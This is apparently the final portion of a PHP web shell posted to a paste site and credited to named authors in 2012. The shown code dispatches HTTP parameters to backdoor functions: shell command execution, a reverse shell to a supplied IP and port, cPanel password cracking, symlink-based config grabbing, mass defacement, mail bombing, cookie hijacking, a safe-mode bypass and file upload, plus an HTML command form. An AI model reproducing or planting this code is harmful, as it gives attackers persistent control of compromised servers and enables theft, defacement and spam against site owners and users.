  2109. echo "</table></div>";
  2110. }
  2111.  
  2112. //////////////////////////////// Frond End Calls ///////////////////////////////
  2113.  
  2114. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  2115. {
  2116. edit_file_bg();
  2117. }
  2118.  
  2119. else if(isset($_REQUEST['sh311_scanner']))
  2120. {
  2121. shell_finder_ui();
  2122. }
  2123.  
  2124. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
  2125. {
  2126. ftp_man_bg();
  2127. }
  2128.  
  2129. else if(isset($_REQUEST['ftpman']))
  2130. {
  2131. ftp_man_ui();
  2132. }
  2133.  
  2134. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
  2135. {
  2136. ssh_man_bg();
  2137. }
  2138.  
  2139. else if(isset($_REQUEST['sshman']))
  2140. {
  2141. ssh_man_ui();
  2142. }
  2143.  
  2144. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
  2145. {
  2146. chdir($_GET['path']);
  2147. code_in_ui();
  2148. }
  2149.  
  2150. else if(isset($_GET['sh311_scanx']))
  2151. {
  2152. shell_finder_bg();
  2153. }
  2154.  
  2155. else if(isset($_REQUEST['config_grab']))
  2156. {
  2157. sym_xxx();
  2158. }
  2159.  
  2160. else if(isset($_REQUEST['ftp_man']))
  2161. {
  2162. ftp_man_ui();
  2163. }
  2164.  
  2165. else if(isset($_REQUEST['mass_xploit']))
  2166. {
  2167. mass_deface_ui();
  2168. }
  2169.  
  2170. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
  2171. {
  2172. ftp_man_bg();
  2173. }
  2174.  
  2175. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  2176. {
  2177. mass_deface_bg();
  2178. }
  2179.  
  2180. else if(isset($_REQUEST['ftp_anon_scan']))
  2181. {
  2182. ftp_anonymous_ui();
  2183. }
  2184.  
  2185. else if(isset($_GET['ftp_anonz']))
  2186. {
  2187. ftp_anonymous_bg();
  2188. }
  2189.  
  2190. else if(isset($_REQUEST['killme']))
  2191. {
  2192. killme();
  2193. }
  2194.  
  2195. else if(isset($_REQUEST['hexenc']))
  2196. {
  2197. hex_encode_ui();
  2198. }
  2199.  
  2200. else if(isset($_REQUEST['remotefiledown']))
  2201. {
  2202. remote_download_ui();
  2203. }
  2204.  
  2205. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  2206. {
  2207. remote_download_bg();
  2208. }
  2209.  
  2210. else if(isset($_REQUEST['cpanel_crack']))
  2211. {
  2212. cpanel_crack();
  2213. }
  2214.  
  2215. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  2216. {
  2217. remote_file_check_bg();
  2218. }
  2219.  
  2220. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  2221. {
  2222. php_ende_bg();
  2223. }
  2224.  
  2225. else if(isset($_REQUEST['remote_server_scan']))
  2226. {
  2227. remote_file_check_ui();
  2228. }
  2229.  
  2230. else if(isset($_REQUEST['server_exploit_details']))
  2231. {
  2232. exploit_details();
  2233. }
  2234.  
  2235. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  2236. {
  2237. massmailer_bg();
  2238. }
  2239.  
  2240. else if(isset($_REQUEST['mysqlman']))
  2241. {
  2242. mysqlman();
  2243. }
  2244.  
  2245. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  2246. {
  2247. mailbomb_bg();
  2248. }
  2249.  
  2250. else if(isset($_REQUEST['cookiejack']))
  2251. {
  2252. cookie_jack();
  2253. }
  2254.  
  2255. else if(isset($_REQUEST['massmailer']))
  2256. {
  2257. massmailer_ui();
  2258. }
  2259.  
  2260. else if(isset($_REQUEST['rename']))
  2261. {
  2262. chdir($_GET['path']);
  2263. rename_ui();
  2264. }
  2265.  
  2266. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  2267. {
  2268. chdir($_GET['path']);
  2269. rename_bg();
  2270. }
  2271.  
  2272. else if(isset($_REQUEST['encodefile']))
  2273. {
  2274. php_ende_ui();
  2275. }
  2276.  
  2277. else if(isset($_REQUEST['edit']))
  2278. {
  2279. edit_file();
  2280. }
  2281.  
  2282. else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
  2283. {
  2284. download();
  2285. }
  2286.  
  2287. else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
  2288. {
  2289. download_gzip();
  2290. }
  2291.  
  2292. else if(isset($_REQUEST['read']))
  2293. {
  2294. chdir($_GET['path']);
  2295. code_viewer();
  2296. }
  2297.  
  2298. else if(isset($_REQUEST['perm']))
  2299. {
  2300. chdir($_GET['path']);
  2301. ch_perm_ui();
  2302. }
  2303.  
  2304. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  2305. {
  2306. chdir($_GET['path']);
  2307. ch_perm_bg();
  2308. }
  2309.  
  2310. else if(isset($_REQUEST['del_fil']))
  2311. {
  2312. chdir($_GET['path']);
  2313. delete_file();
  2314. exit;
  2315. }
  2316. else if(isset($_REQUEST['phpinfo']))
  2317. {
  2318. chdir($_GET['path']);
  2319. ob_clean();
  2320. echo phpinfo();
  2321. exit;
  2322. }
  2323. else if(isset($_REQUEST['del_dir']))
  2324. {
  2325. chdir($_GET['path']);
  2326. $d_dir=$_GET['del_dir'];
  2327. deldirs($d_dir);
  2328. }
  2329. else if(isset($_GET['path']) && isset($_GET['new_file']))
  2330. {
  2331. chdir($_GET['path']);
  2332. mk_file_ui();
  2333. }
  2334. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  2335. {
  2336. mk_file_bg();
  2337. }
  2338. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  2339. {
  2340. chdir($_GET['path']);
  2341. create_dir();
  2342. }
  2343. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  2344. {
  2345. chdir($_GET['path']);
  2346. cmd();
  2347. }
  2348. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  2349. {
  2350. upload_file();
  2351. }
  2352. else if(isset($_REQUEST['rs']))
  2353. {
  2354. reverse_conn_ui();
  2355. }
  2356. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  2357. {
  2358. reverse_conn_bg();
  2359. }
  2360. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  2361. {
  2362. chdir($_GET['path']);
  2363. safe_mode_fuck_ui();
  2364. }
  2365. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  2366. {
  2367. safe_mode_fuck();
  2368. }
  2369. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  2370. {
  2371. AccessDenied();
  2372. }
  2373.  
  2374. else if(isset($_REQUEST['symlink']))
  2375. {
  2376. sym_link();
  2377. }
  2378.  
  2379. else if(isset($_GET['path']) && isset($_GET['copy']))
  2380. {
  2381. copy_file_ui();
  2382. }
  2383. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  2384. {
  2385. copy_file_bg();
  2386. }
  2387. else
  2388. {
  2389. filemanager_bg();
  2390. }
  2391.  
  2392. ////////////////////////////// End Frond End Calls //////////////////////////////
  2393.  
  2394. echo "</div><div id=result><center><p><table class='tbl'>
  2395. <tr><td><form method='GET'>PWD : <input size='50' name='path' value='".getcwd()."'><input type='submit' value=' >> ' /></form></td></tr></table>
  2396. <table class='tbl'><tr>
  2397. <td><form style='float:right;' method='GET'><input name='path' value='".getcwd()."' type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form>
  2398. </td>
  2399. <td><form style='float:left;' method='GET'><input name='path' value='".getcwd()."' type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form>
  2400. </td>
  2401. </tr>
  2402. <tr>
  2403. <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value='".getcwd()."' type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form>
  2404. </td>
  2405. <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value='".getcwd()."' type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form>
  2406. </td>
  2407. </tr>
  2408. </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  2409. ?>
Add Comment
Please, Sign In to add comment